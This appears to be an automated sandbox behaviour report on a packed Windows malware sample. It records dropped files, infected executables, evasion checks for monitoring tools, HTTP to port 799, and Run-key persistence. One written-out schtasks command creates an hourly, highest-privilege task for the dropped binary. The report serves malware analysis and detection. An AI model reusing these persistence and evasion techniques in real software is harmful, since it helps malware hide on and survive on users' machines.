Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "	Jump to behavior

Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: hunta[1].exe

Static file information: File size 2383872 > 1048576

Source: hunta[1].exe

Static PE information: Raw size of gpsaqaiu is bigger than: 0x100000 < 0x1ad600

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\hunta[1].exe	Unpacked PE file: 2.2.hunta[1].exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Unpacked PE file: 4.2.WwKLWFk.exe.210000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 14.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 15.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Unpacked PE file: 21.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Unpacked PE file: 22.2.WwKLWFk.exe.b50000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Unpacked PE file: 24.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: u

Source: hunta[1].exe	Static PE information: section name:
Source: hunta[1].exe	Static PE information: section name: .idata
Source: hunta[1].exe	Static PE information: section name:
Source: hunta[1].exe	Static PE information: section name: gpsaqaiu
Source: hunta[1].exe	Static PE information: section name: zlufpcnd
Source: hunta[1].exe	Static PE information: section name: .taggant
Source: hunta[1].exe	Static PE information: section name: u
Source: RageMP131.exe.2.dr	Static PE information: section name:
Source: RageMP131.exe.2.dr	Static PE information: section name: .idata
Source: RageMP131.exe.2.dr	Static PE information: section name:
Source: RageMP131.exe.2.dr	Static PE information: section name: gpsaqaiu
Source: RageMP131.exe.2.dr	Static PE information: section name: zlufpcnd
Source: RageMP131.exe.2.dr	Static PE information: section name: .taggant
Source: RageMP131.exe.2.dr	Static PE information: section name: u
Source: MPGPH131.exe.2.dr	Static PE information: section name:
Source: MPGPH131.exe.2.dr	Static PE information: section name: .idata
Source: MPGPH131.exe.2.dr	Static PE information: section name:
Source: MPGPH131.exe.2.dr	Static PE information: section name: gpsaqaiu
Source: MPGPH131.exe.2.dr	Static PE information: section name: zlufpcnd
Source: MPGPH131.exe.2.dr	Static PE information: section name: .taggant
Source: MPGPH131.exe.2.dr	Static PE information: section name: u
Source: WwKLWFk.exe.2.dr	Static PE information: section name: .aspack
Source: WwKLWFk.exe.2.dr	Static PE information: section name: .adata
Source: MyProg.exe.4.dr	Static PE information: section name: PELIB
Source: MyProg.exe.4.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.4.dr	Static PE information: section name: u
Source: Uninstall.exe.4.dr	Static PE information: section name: EpNuZ

Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F5D157 push ecx; ret	2_2_00F5D16A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_00211638 push dword ptr [00213084h]; ret	4_2_0021170E
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_0021600A push ebp; ret	4_2_0021600D
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_00216014 push 002114E1h; ret	4_2_00216425
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_00212D9B push ecx; ret	4_2_00212DAB
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003DD157 push ecx; ret	14_2_003DD16A
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003DD157 push ecx; ret	15_2_003DD16A
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_0034D157 push ecx; ret	21_2_0034D16A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B51638 push dword ptr [00B53084h]; ret	22_2_00B5170E
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B56014 push 00B514E1h; ret	22_2_00B56425
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B52D9B push ecx; ret	22_2_00B52DAB
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B5600A push ebp; ret	22_2_00B5600D
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_0034D157 push ecx; ret	24_2_0034D16A

Source: hunta[1].exe	Static PE information: section name: entropy: 7.9863529700778955
Source: hunta[1].exe	Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: hunta[1].exe	Static PE information: section name: u entropy: 6.9350665765420185
Source: RageMP131.exe.2.dr	Static PE information: section name: entropy: 7.9863529700778955
Source: RageMP131.exe.2.dr	Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: RageMP131.exe.2.dr	Static PE information: section name: u entropy: 6.9350665765420185
Source: MPGPH131.exe.2.dr	Static PE information: section name: entropy: 7.9863529700778955
Source: MPGPH131.exe.2.dr	Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: MPGPH131.exe.2.dr	Static PE information: section name: u entropy: 6.9350665765420185
Source: WwKLWFk.exe.2.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: MyProg.exe.4.dr	Static PE information: section name: Y\|uR entropy: 6.933467573803484
Source: SciTE.exe.4.dr	Static PE information: section name: u entropy: 6.934542386941867
Source: Uninstall.exe.4.dr	Static PE information: section name: EpNuZ entropy: 6.934080518099734

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hunta[1].exe	File created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hunta[1].exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hunta[1].exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\hunta[1].exe

File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\hunta[1].exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\hunta[1].exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 799

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
